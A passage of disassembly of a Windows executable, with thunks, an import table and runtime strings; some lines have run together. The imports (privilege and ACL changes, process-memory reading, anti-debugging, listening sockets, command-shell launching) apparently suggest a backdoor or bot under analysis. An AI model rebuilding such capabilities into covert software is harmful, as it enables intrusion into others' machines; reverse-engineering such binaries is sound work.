lea ecx, [ebp-160h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-170h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-3A4h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-140h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-344h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-2C4h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-2E4h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-0E0h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-1A0h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-234h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-130h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-274h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-254h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-294h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-150h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-190h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-2D4h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-120h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-314h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-2F4h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-334h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-100h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-180h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
loc_436500: ; DATA XREF: .text:loc_419FC5�o
mov eax, offset dword_4383F4
jmp loc_42B4A6
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-20h]
jmp loc_41B352
; ---------------------------------------------------------------------------
loc_436514: ; DATA XREF: sub_41B12F�o
mov eax, offset dword_43848C
jmp loc_42B4A6
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-14h]
jmp sub_42B94B
; ---------------------------------------------------------------------------
loc_436528: ; DATA XREF: sub_41B189�o
mov eax, offset dword_4384B0
jmp loc_42B4A6
; ---------------------------------------------------------------------------
align 4
mov ecx, [ebp-10h]
jmp sub_42B94B
; ---------------------------------------------------------------------------
loc_43653C: ; DATA XREF: sub_41B213�o
mov eax, offset dword_4384F0
jmp loc_42B4A6
; ---------------------------------------------------------------------------
align 4
mov ecx, [ebp-10h]
jmp sub_42B94B
; ---------------------------------------------------------------------------
loc_436550: ; DATA XREF: sub_41B26C�o
mov eax, offset dword_438514
jmp loc_42B4A6
; ---------------------------------------------------------------------------
align 4
mov ecx, [ebp-10h]
jmp sub_42B94B
; ---------------------------------------------------------------------------
loc_436564: ; DATA XREF: sub_41B2C4�o
mov eax, offset dword_438538
jmp loc_42B4A6
; ---------------------------------------------------------------------------
align 10h
loc_436570: ; DATA XREF: sub_41B74C�o
mov eax, offset dword_438588
jmp loc_42B4A6
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-1Ch]
jmp sub_42017F
; ---------------------------------------------------------------------------
loc_436584: ; DATA XREF: sub_41F7B0�o
mov eax, offset dword_4385AC
jmp loc_42B4A6
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-10h]
jmp loc_426C4D
; ---------------------------------------------------------------------------
loc_436598: ; DATA XREF: .text:004385D4�o
lea ecx, [ebp-20h]
jmp loc_426C4D
; ---------------------------------------------------------------------------
lea ecx, [ebp-2Ch]
jmp loc_426C4D
; ---------------------------------------------------------------------------
lea ecx, [ebp-28h]
jmp loc_426C4D
; ---------------------------------------------------------------------------
loc_4365B0: ; DATA XREF: sub_423BB1�o
mov eax, offset dword_4385E8
jmp loc_42B4A6
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-20h]
jmp loc_41B352
; ---------------------------------------------------------------------------
loc_4365C4: ; DATA XREF: sub_429011�o
mov eax, offset dword_438648
jmp loc_42B4A6
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-10h]
jmp sub_42B94B
; ---------------------------------------------------------------------------
loc_4365D8: ; DATA XREF: sub_42906B�o
mov eax, offset dword_438670
jmp loc_42B4A6
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-20h]
jmp loc_41B352
; ---------------------------------------------------------------------------
loc_4365EC: ; DATA XREF: sub_4290F9�o
mov eax, offset dword_438698
jmp loc_42B4A6
; ---------------------------------------------------------------------------
align 4
dd 282h dup(0)
dword_437000 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_424C9C+139�r ...
dword_437004 dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_424C9C+58�r ...
dword_437008 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_43700C dd 77DFD4C9h ; resolved to->ADVAPI32.GetUserNameAdword_437010 dd 77DD7753h ; resolved to->ADVAPI32.OpenProcessToken ; sub_424DE2+4E�r
dword_437014 dd 77DFD11Bh ; resolved to->ADVAPI32.LookupPrivilegeValueAdword_437018 dd 77DFC534h ; resolved to->ADVAPI32.AdjustTokenPrivilegesdword_43701C dd 77DF08D5h ; resolved to->ADVAPI32.GetSecurityInfodword_437020 dd 77E215D9h ; resolved to->ADVAPI32.SetEntriesInAclAdword_437024 dd 77DF087Fh ; resolved to->ADVAPI32.SetSecurityInfodword_437028 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExA ; sub_424FC9+88�r ...
align 10h
dword_437030 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_409EB3+20�r ...
dword_437034 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_409EB3+F�r ...
dword_437038 dd 7C80ABDEh ; resolved to->KERNEL32.FreeLibrary ; sub_4248BB+1A�r
dword_43703C dd 7C80992Fh ; resolved to->KERNEL32.LocalFree ; sub_42226C+95�r ...
dword_437040 dd 7C80B905h ; resolved to->KERNEL32.MapViewOfFile ; sub_402A0E+43�r ...
dword_437044 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_4029DF+1A�r ...
dword_437048 dd 7C80B974h ; resolved to->KERNEL32.UnmapViewOfFile ; sub_402A0E+69�r ...
dword_43704C dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcess ; sub_41E6F8+83�r ...
dword_437050 dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExA ; sub_40A938+B9E�r ...
dword_437054 dd 7C81CE03h ; resolved to->KERNEL32.TerminateThread ; sub_423463+6B�r
dword_437058 dd 7C8312E5h ; resolved to->KERNEL32.TransactNamedPipe ; sub_4066B3+125�r ...
dword_43705C dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_405C6A+B8�r ...
dword_437060 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_40A938+4C31�r ...
dword_437064 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileA ; sub_4053EE+3D0�r ...
dword_437068 dd 7C812782h ; resolved to->KERNEL32.SetFileAttributesA ; sub_4053EE+51F�r ...
dword_43706C dd 7C81153Ch ; resolved to->KERNEL32.GetFileAttributesA ; sub_4053EE+508�r ...
dword_437070 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; sub_40A708+24�r ...
dword_437074 dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiByte ; sub_430CCF+20D�r ...
dword_437078 dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; sub_405C6A+2E7�r ...
dword_43707C dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObject ; sub_40A938+29EA�r ...
dword_437080 dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_437084 dd 7C80180Eh ; resolved to->KERNEL32.ReadFile ; sub_405C6A+613�r ...
dword_437088 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_40797B+477�r ...
dword_43708C dd 7C8217ACh ; resolved to->KERNEL32.CreateDirectoryA ; sub_40797B+275�r
dword_437090 dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_40A938+1B2D�r ...
dword_437094 dd 7C8214E3h ; resolved to->KERNEL32.GetDriveTypeAdword_437098 dd 7C82C2D3h ; resolved to->KERNEL32.GetLogicalDriveStringsA ; sub_41BD3B+247�r
dword_43709C dd 7C8216A4h ; resolved to->KERNEL32.GetComputerNameAdword_4370A0 dd 7C813093h ; resolved to->KERNEL32.IsDebuggerPresentdword_4370A4 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_40A938+A95�r ...
dword_4370A8 dd 7C835DCAh ; resolved to->KERNEL32.GetTempPathA ; sub_427BB8+17�r
dword_4370AC dd 7C810B8Eh ; resolved to->KERNEL32.SetFilePointer ; sub_42F84D+2A�r
dword_4370B0 dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_4370B4 dd 7C835E8Fh ; resolved to->KERNEL32.MoveFileAdword_4370B8 dd 7C80945Ch ; resolved to->KERNEL32.CreateFileMappingA ; sub_425156+A7�r ...
dword_4370BC dd 7C82FA46h ; resolved to->KERNEL32.QueryPerformanceFrequency ; sub_418EDB+DB�r ...
dword_4370C0 dd 7C80A427h ; resolved to->KERNEL32.QueryPerformanceCounter ; sub_418EDB+D0�r ...
dword_4370C4 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_4181F4+687�r ...
dword_4370C8 dd 7C901005h ; resolved to->NTDLL.RtlEnterCriticalSection ; sub_42C104+28�r ...
dword_4370CC dd 7C8024A7h ; resolved to->KERNEL32.ReleaseMutex ; sub_427CE1+89�r
dword_4370D0 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_4370D4 dd 7C83039Bh ; resolved to->KERNEL32.GetDiskFreeSpaceExAdword_4370D8 dd 7C81F992h ; resolved to->KERNEL32.GlobalMemoryStatusExdword_4370DC dd 7C83632Dh ; resolved to->KERNEL32.GetTimeFormatAdword_4370E0 dd 7C8361EEh ; resolved to->KERNEL32.GetDateFormatAdword_4370E4 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_420399+3BA�r
dword_4370E8 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoA ; sub_41D3AF+2F�r ...
dword_4370EC dd 7C830D74h ; resolved to->KERNEL32.lstrcmpA ; sub_423BB1+3B7�r ...
dword_4370F0 dd 7C81AE17h ; resolved to->KERNEL32.GetExitCodeProcess ; sub_43475B+1B9�r
dword_4370F4 dd 7C85F90Fh ; resolved to->KERNEL32.PeekNamedPipedword_4370F8 dd 7C80DDFEh ; resolved to->KERNEL32.DuplicateHandledword_4370FC dd 7C81E0C7h ; resolved to->KERNEL32.CreatePipedword_437100 dd 7C8021CCh ; resolved to->KERNEL32.ReadProcessMemorydword_437104 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_41EF29+82�r ...
dword_437108 dd 7C8643B5h ; resolved to->KERNEL32.Module32Nextdword_43710C dd 7C801E16h ; resolved to->KERNEL32.TerminateProcess ; sub_41FD79+1A0�r ...
dword_437110 dd 7C864230h ; resolved to->KERNEL32.Module32Firstdword_437114 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_437118 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_43711C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_437120 dd 7C8098EBh ; resolved to->KERNEL32.GetCurrentThread ; sub_41FF76+1C�r
dword_437124 dd 7C80998Dh ; resolved to->KERNEL32.LocalAllocdword_437128 dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_43712C dd 7C831CB8h ; resolved to->KERNEL32.SetFileTimedword_437130 dd 7C831C45h ; resolved to->KERNEL32.GetFileTimedword_437134 dd 7C821363h ; resolved to->KERNEL32.GetWindowsDirectoryAdword_437138 dd 7C80A7D4h ; resolved to->KERNEL32.GetLocalTime ; sub_42A705+D�r
dword_43713C dd 7C80EDD7h ; resolved to->KERNEL32.FindClosedword_437140 dd 7C834EB1h ; resolved to->KERNEL32.FindNextFileA ; sub_428046+107�r
dword_437144 dd 7C8137D9h ; resolved to->KERNEL32.FindFirstFileAdword_437148 dd 7C85B219h ; resolved to->KERNEL32.RemoveDirectoryAdword_43714C dd 7C812D9Fh ; resolved to->KERNEL32.TlsAllocdword_437150 dd 7C809728h ; resolved to->KERNEL32.GetCurrentThreadId ; sub_42E41E+45�r
dword_437154 dd 7C809EF1h ; resolved to->KERNEL32.InitializeCriticalSection ; sub_42DA1F+3D�r ...
dword_437158 dd 7C809E79h ; resolved to->KERNEL32.IsBadWritePtrdword_43715C dd 7C9179FDh ; resolved to->NTDLL.RtlReAllocateHeap ; sub_431BB3+14F�r ...
dword_437160 dd 7C9010EDh ; resolved to->NTDLL.RtlLeaveCriticalSection ; sub_42C156+28�r ...
dword_437164 dd 7C91188Ah ; resolved to->NTDLL.RtlDeleteCriticalSection ; sub_40242A+206�r ...
dword_437168 dd 7C80B829h ; resolved to->KERNEL32.InitializeCriticalSectionAndSpinCountdword_43716C dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; sub_4051C0:loc_4052C6�r ...
dword_437170 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_402646+1A7�r ...
dword_437174 dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiA ; sub_402CBA+27F�r ...
dword_437178 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_4032A3+1F�r ...
dword_43717C dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_40242A+14C�r ...
dword_437180 dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChar ; sub_40532D+16�r ...
dword_437184 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; sub_401A77+2�r ...
dword_437188 dd 7C802367h ; resolved to->KERNEL32.CreateProcessA ; sub_4181F4+62E�r ...
dword_43718C dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_401B6E+2B5�r ...
dword_437190 dd 7C809A51h ; resolved to->KERNEL32.VirtualAlloc ; sub_42CF38+51�r ...
dword_437194 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFree ; sub_42D329+120�r ...
dword_437198 dd 7C833478h ; resolved to->KERNEL32.SetEnvironmentVariableAdword_43719C dd 7C80A35Eh ; resolved to->KERNEL32.CompareStringW ; sub_435A15+261�r
dword_4371A0 dd 7C80D077h ; resolved to->KERNEL32.CompareStringA ; sub_435A15+B9�r
dword_4371A4 dd 7C832044h ; resolved to->KERNEL32.SetEndOfFiledword_4371A8 dd 7C80BCCFh ; resolved to->KERNEL32.IsBadCodePtrdword_4371AC dd 7C809E01h ; resolved to->KERNEL32.IsBadReadPtrdword_4371B0 dd 7C812641h ; resolved to->KERNEL32.FlushFileBuffersdword_4371B4 dd 7C80A490h ; resolved to->KERNEL32.GetStringTypeW ; sub_43340D+12D�r
dword_4371B8 dd 7C838A0Ch ; resolved to->KERNEL32.GetStringTypeA ; sub_43340D+8D�r
dword_4371BC dd 7C812F08h ; resolved to->KERNEL32.GetEnvironmentStringsWdword_4371C0 dd 7C81CF5Bh ; resolved to->KERNEL32.GetEnvironmentStringsA ; sub_432E65+E1�r
dword_4371C4 dd 7C814AE7h ; resolved to->KERNEL32.FreeEnvironmentStringsWdword_4371C8 dd 7C81DF77h ; resolved to->KERNEL32.FreeEnvironmentStringsAdword_4371CC dd 7C8127A7h ; resolved to->KERNEL32.GetOEMCPdword_4371D0 dd 7C809915h ; resolved to->KERNEL32.GetACPdword_4371D4 dd 7C812E76h ; resolved to->KERNEL32.GetCPInfo ; sub_43284B+14�r ...
dword_4371D8 dd 7C81DC03h ; resolved to->KERNEL32.SetStdHandle ; sub_43228A:loc_4322E0�r
dword_4371DC dd 7C84467Dh ; resolved to->KERNEL32.SetUnhandledExceptionFilter ; sub_432027+6�r
dword_4371E0 dd 7C9109EDh ; resolved to->NTDLL.RtlSizeHeapdword_4371E4 dd 7C80CCA8h ; resolved to->KERNEL32.LCMapStringW ; sub_430CCF+14D�r ...
dword_4371E8 dd 7C838DE8h ; resolved to->KERNEL32.LCMapStringA ; sub_430CCF+A7�r
dword_4371EC dd 7C862E2Ah ; resolved to->KERNEL32.UnhandledExceptionFilterdword_4371F0 dd 7C810E51h ; resolved to->KERNEL32.GetFileType ; sub_42F62C+17A�r ...
dword_4371F4 dd 7C812BB6h ; resolved to->KERNEL32.HeapCreatedword_4371F8 dd 7C810EF8h ; resolved to->KERNEL32.HeapDestroydword_4371FC dd 7C812F39h ; resolved to->KERNEL32.GetStdHandle ; sub_432FD0+143�r
dword_437200 dd 7C80CC97h ; resolved to->KERNEL32.SetHandleCountdword_437204 dd 7C809740h ; resolved to->KERNEL32.TlsGetValue ; sub_42E485+18�r
dword_437208 dd 7C910340h ; resolved to->NTDLL.RtlSetLastWin32Errordword_43720C dd 7C9105D4h ; resolved to->NTDLL.RtlAllocateHeap ; sub_42B2CA+F6�r ...
dword_437210 dd 7C91043Dh ; resolved to->NTDLL.RtlFreeHeap ; sub_42C855+2C5�r ...
dword_437214 dd 7C8350BFh ; resolved to->KERNEL32.GetTimeZoneInformation ; sub_4338E9+4E�r
dword_437218 dd 7C80176Bh ; resolved to->KERNEL32.GetSystemTimedword_43721C dd 7C80977Ah ; resolved to->KERNEL32.InterlockedDecrement ; sub_42AE50+53�r ...
dword_437220 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_42AE50+44�r ...
dword_437224 dd 7C8328F7h ; resolved to->KERNEL32.ResumeThreaddword_437228 dd 7C809BC5h ; resolved to->KERNEL32.TlsSetValue ; sub_42E3B7+2E�r ...
dword_43722C dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_437230 dd 7C812A09h ; resolved to->KERNEL32.RaiseException ; sub_42FBE4+215�r
dword_437234 dd 7C801EEEh ; resolved to->KERNEL32.GetStartupInfoA ; sub_42F62C+5E�r
dword_437238 dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_43723C dd 7C8111DAh ; resolved to->KERNEL32.GetVersiondword_437240 dd 7C814AF2h ; resolved to->KERNEL32.GetEnvironmentVariableA align 8
dword_437248 dd 71B2517Fh align 10h
dword_437250 dd 7712A63Fh align 8
dword_437258 dd 7CAB8CB2h ; sub_422394+4D�r
dword_43725C dd 7CA40EE0h ; sub_41E96A+28�r ...
dd 0
dword_437264 dd 7E44F209h ; resolved to->USER32.IsCharAlphaNumericA ; sub_423850+2CB�r ...
dword_437268 dd 7E42E5C2h ; resolved to->USER32.CharLowerAdword_43726C dd 7E42F420h ; resolved to->USER32.GetClassNameA ; sub_426B7C+19�r
dword_437270 dd 7E42F383h ; resolved to->USER32.SendMessageA ; sub_426B7C+7D�r
dword_437274 dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_41557B+2C�r ...
dd 0
dword_43727C dd 76A08017h dd 0
dword_437284 dd 71AC0BDEh ; resolved to->WS2_32.shutdowndword_437288 dd 71AB3EA1h ; resolved to->WS2_32.setsockopt ; sub_42251B+C2�r ...
dword_43728C dd 71AB4519h ; resolved to->WS2_32.ioctlsocket ; sub_41DC43+A6�r ...
dword_437290 dd 71AB2C69h ; resolved to->WS2_32.sendto ; sub_41DDA8+31D�r ...
dword_437294 dd 71AB3E00h ; resolved to->WS2_32.binddword_437298 dd 71AB951Eh ; resolved to->WS2_32.getsocknamedword_43729C dd 71AB88D3h ; resolved to->WS2_32.listendword_4372A0 dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_40A938+8409�r ...
dword_4372A4 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_41F02F+E2�r ...
dword_4372A8 dd 71AB4428h ; resolved to->WS2_32.WSACleanupdword_4372AC dd 71AB2DC0h ; resolved to->WS2_32.selectdword_4372B0 dd 71AC1028h ; resolved to->WS2_32.acceptdword_4372B4 dd 71AB664Dh ; resolved to->WS2_32.WSAStartup ; sub_407373+19�r ...
dword_4372B8 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_4066B3+48�r ...
dword_4372BC dd 71AB2BF4h ; resolved to->WS2_32.inet_addr ; sub_409F99+33�r ...
dword_4372C0 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_4044F6+29C�r ...
dword_4372C4 dd 71AB8769h ; resolved to->WS2_32.WSASocketA ; sub_42251B+7B�r ...
dword_4372C8 dd 71AB406Ah ; resolved to->WS2_32.connect ; sub_4044F6+2AD�r ...
dword_4372CC dd 71AB428Ah ; resolved to->WS2_32.send ; .text:00404003�r ...
dword_4372D0 dd 71AB615Ah ; resolved to->WS2_32.recv ; .text:004040D8�r ...
dword_4372D4 dd 71AB9639h ; resolved to->WS2_32.closesocket ; .text:004040ED�r ...
dword_4372D8 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastError ; sub_42251B+CD�r ...
dword_4372DC dd 71AB50C8h ; resolved to->WS2_32.gethostname ; sub_426C5A+16�r ...
dword_4372E0 dd 71AB2BC0h ; resolved to->WS2_32.ntohl ; sub_428D2F+B5�r
dword_4372E4 dd 71AB46C9h ; resolved to->WS2_32.getsockoptdword_4372E8 dd 71AB4544h ; resolved to->WS2_32.__WSAFDIsSetdword_4372EC dd 71AB2BC0h ; resolved to->WS2_32.ntohl dd 0
dword_4372F4 dd 76D6B096h ; resolved to->IPHLPAPI.GetUdpTable align 10h
flt_437300 dd 5.0e-1 ; DATA XREF: sub_405C6A+509�r
align 8
dword_437308 dd 0FFFFFFFFh, 40A52Bh, 40A55Ch, 0dword_437318 dd 0FFFFFFFFh, 40A5CAh, 40A5CEh, 0dbl_437328 dq 9.765625e-4 ; DATA XREF: sub_4181F4+223�r
; sub_4181F4+238�r ...
dword_437330 dd 10h ; sub_40A938+621�r ...
off_437334 dd offset sub_419565 ; DATA XREF: sub_419551+4�o
; sub_419581+F�o ...
dword_437338 dd 2 dup(0) ; sub_41B35A+57�o ...
dbl_437340 dq -3.0517578125e-5 ; DATA XREF: sub_41E34F+1F�r
flt_437348 dd 9.765625e-4 ; DATA XREF: sub_425D4F+1B5�r
flt_43734C dd 8.0 ; DATA XREF: sub_425D4F+1AF�r
flt_437350 dd 0.0 ; DATA XREF: sub_425D4F+174�r
flt_437354 dd 1.0e-3 ; DATA XREF: sub_425D4F+16B�r
dbl_437358 dq -1.52587890625e-4 ; DATA XREF: sub_426698+3DF�r
dbl_437360 dq 3.0517578125e-4 ; DATA XREF: sub_426698+3C0�r
dbl_437368 dq -3.0517578125e-4 ; DATA XREF: sub_426698+33E�r
; sub_426698+3A2�r
dbl_437370 dq 1.52587890625e-4 ; DATA XREF: sub_426698+279�r
dbl_437378 dq -1.739501953125e-3 ; DATA XREF: sub_426698+254�r
; sub_426698+2DD�r ...
dbl_437380 dq 3.143310546875e-3 ; DATA XREF: sub_426698+ED�r
dbl_437388 dq 3.0517578125e-5 ; DATA XREF: sub_426698+BA�r
; sub_426698+143�r ...
dbl_437390 dq 6.103515625e-5 ; DATA XREF: sub_426698+9F�r
; sub_426698+309�r
dbl_437398 dq 2.288818359375e-3 ; DATA XREF: sub_426698+2E�r
dd offset dword_437FB8
off_4373A4 dd offset loc_4290C5 ; DATA XREF: sub_429011+4D�o
; sub_4290E1+C�o
dd offset sub_41B1E9
dd offset sub_4290A8
aStringTooLong db 'string too long',0 ; DATA XREF: sub_429011+1E�o
dd offset dword_437FF0
off_4373C4 dd offset loc_41B250 ; DATA XREF: sub_41B189+4A�o
; sub_41B213+11�o ...
dd offset sub_41B1E9
dd offset sub_41B1F6
dd offset dword_438040
off_4373D4 dd offset loc_41B31E ; DATA XREF: sub_41B12F+4D�o
; sub_41B33A+C�o ...
dd offset sub_41B1E9
dd offset sub_41B301
aInvalidStringP db 'invalid string position',0 ; DATA XREF: sub_4290F9+1E�o
dd offset dword_438088
off_4373FC dd offset sub_42925B ; DATA XREF: sub_429229+12�o
; .text:00429290�o ...
dword_437400 dd 0FFFFFFFFh, 0 dd offset sub_42978D
dd 0FFFFFFFFh, 0
dd offset sub_4297E9
dword_437418 dd 0FFFFFFFFh, 0 dd offset sub_42988C
dd 0FFFFFFFFh, 0
dd offset sub_4298E4
dbl_437430 dq 1.0 ; DATA XREF: sub_42A636+6C�r
; sub_4305AA+2A�r
dword_437438 dd 0FFFFFFFFh, 42AB9Ch, 42ABB0hdword_437444 dd 6D6D6F63h, 2E646E61h, 6D6F63hdword_437450 dd 632Fh aComspec db 'COMSPEC',0 ; DATA XREF: sub_42B019+8�o
align 10h
dword_437460 dd 0FFFFFFFFh, 0 dd offset sub_42B35E
dd 0FFFFFFFFh, 0
dd offset sub_42B3E7
dword_437478 dd 0E06D7363h, 1, 2 dup(0) dd 3, 19930520h, 2 dup(0)
dd offset dword_4380B8
off_43749C dd offset sub_42B8A8 ; DATA XREF: sub_42B8C4+8�o
; sub_42B901+8�o ...
dd offset sub_42B961
aUnknownExcepti db 'Unknown exception',0 ; DATA XREF: sub_42B961+7�o
align 4
dd offset dword_438100
off_4374BC dd offset loc_42B997 ; DATA XREF: sub_42B96E+5�o
; .text:off_447364�o ...
dword_4374C0 dd 0FFFFFFFFh, 42C58Dh, 42C5A1ha__global_heap_ db '__GLOBAL_HEAP_SELECTED',0 ; DATA XREF: sub_42C63D+8E�o
align 4
a__msvcrt_heap_ db '__MSVCRT_HEAP_SELECT',0 ; DATA XREF: sub_42C63D+4F�o
align 4
byte_4374FC db 6 ; DATA XREF: sub_42DBAD:loc_42DC04�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
dd 60686008h, 606060h, 78707000h, 8787878h, 807h, 8080007h
dd 8000008h, 7000800h, 8
aNull: ; DATA XREF: .text:off_45321C�o
unicode 0, <(null)>,0
align 4
aNull_0 db '(null)',0 ; DATA XREF: .text:off_453218�o
align 10h
a_yn db '_yn',0
a_y1 db '_y1',0
a_y0 db '_y0',0
aFrexp db 'frexp',0
align 4
aFmod db 'fmod',0
align 4
a_hypot db '_hypot',0
align 4
a_cabs db '_cabs',0
align 4
aLdexp db 'ldexp',0
align 4
aModf db 'modf',0
align 4
aFabs db 'fabs',0
align 4
aFloor db 'floor',0
align 4
aCeil db 'ceil',0
align 4
aTan db 'tan',0
aCos db 'cos',0
aSin db 'sin',0
aSqrt db 'sqrt',0
align 4
aAtan2 db 'atan2',0
align 10h
aAtan db 'atan',0
align 4
aAcos db 'acos',0
align 10h
aAsin db 'asin',0
align 4
aTanh db 'tanh',0
align 10h
aCosh db 'cosh',0
align 4
aSinh db 'sinh',0
align 10h
aLog10 db 'log10',0
align 4
dd offset dword_676F6C
dd 776F70h
dword_437620 dd 707865h, 0 dbl_437628 dq 0.0 ; DATA XREF: sub_42FE97+8C�r
; sub_42FE97+AC�r ...
dbl_437630 dq 4.195835e6 ; DATA XREF: sub_4305AA+F�r
dbl_437638 dq 3.145727e6 ; DATA XREF: sub_4305AA+6�r
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_4305E8+F�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: sub_4305E8�o
align 4
aE000 db 'e+000',0 ; DATA XREF: sub_430770+57�o
align 10h
dword_437670 dd 2 dup(0) ; sub_43340D+39�o ...
dword_437678 dd 0FFFFFFFFh, 430DDFh, 430DE3h, 0FFFFFFFFh, 430E93h, 430E97h
; DATA XREF: sub_430CCF+5�o
aPath db 'PATH',0 ; DATA XREF: sub_430EF3+49�o
align 4
a_com db '.com',0 ; DATA XREF: .text:off_4538AC�o
align 10h
a_exe db '.exe',0 ; DATA XREF: .text:004538A8�o
align 4
a_bat db '.bat',0 ; DATA XREF: .text:004538A4�o
align 10h
a_cmd db '.cmd',0 ; DATA XREF: .text:off_4538A0�o
align 4
a__0 db '.\',0 ; DATA XREF: sub_431058+51�o
align 10h
dword_4376C0 dd 0FFFFFFFFh, 43164Ch, 431656h, 0dword_4376D0 dd 0FFFFFFFFh, 0 dd offset loc_4317DB
align 10h
dd offset sub_4317B9
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 17h, 43h, 0
dword_4376E8 dd 0FFFFFFFFh, 431A11h, 431A15h, 0dword_4376F8 dd 0FFFFFFFFh, 431A73h, 431A7Ch, 0dword_437708 dd 0FFFFFFFFh, 0 dd offset loc_431B58
align 8
dd offset loc_431B44
dd offset loc_431B48
dword_437720 dd 0FFFFFFFFh, 0 dd offset loc_431BAE
align 10h
dd offset loc_431B9A
dd offset loc_431B9E
dword_437738 dd 0FFFFFFFFh, 0 dd offset sub_431D36
dd 0FFFFFFFFh, 0
dd offset sub_431E86
dword_437750 dd 0FFFFFFFFh, 0 dd offset sub_431F49
dd 0FFFFFFFFh, 0
dd offset sub_431FC4
aIllegalByteSeq db 'Illegal byte sequence',0 ; DATA XREF: .text:0045396C�o
align 10h
aDirectoryNotEm db 'Directory not empty',0 ; DATA XREF: .text:00453968�o
aFunctionNotImp db 'Function not implemented',0 ; DATA XREF: .text:00453964�o
align 10h
aNoLocksAvailab db 'No locks available',0 ; DATA XREF: .text:00453960�o
align 4
aFilenameTooLon db 'Filename too long',0 ; DATA XREF: .text:0045395C�o
align 4
aResourceDeadlo db 'Resource deadlock avoided',0 ; DATA XREF: .text:00453954�o
align 4
aResultTooLarge db 'Result too large',0 ; DATA XREF: .text:0045394C�o
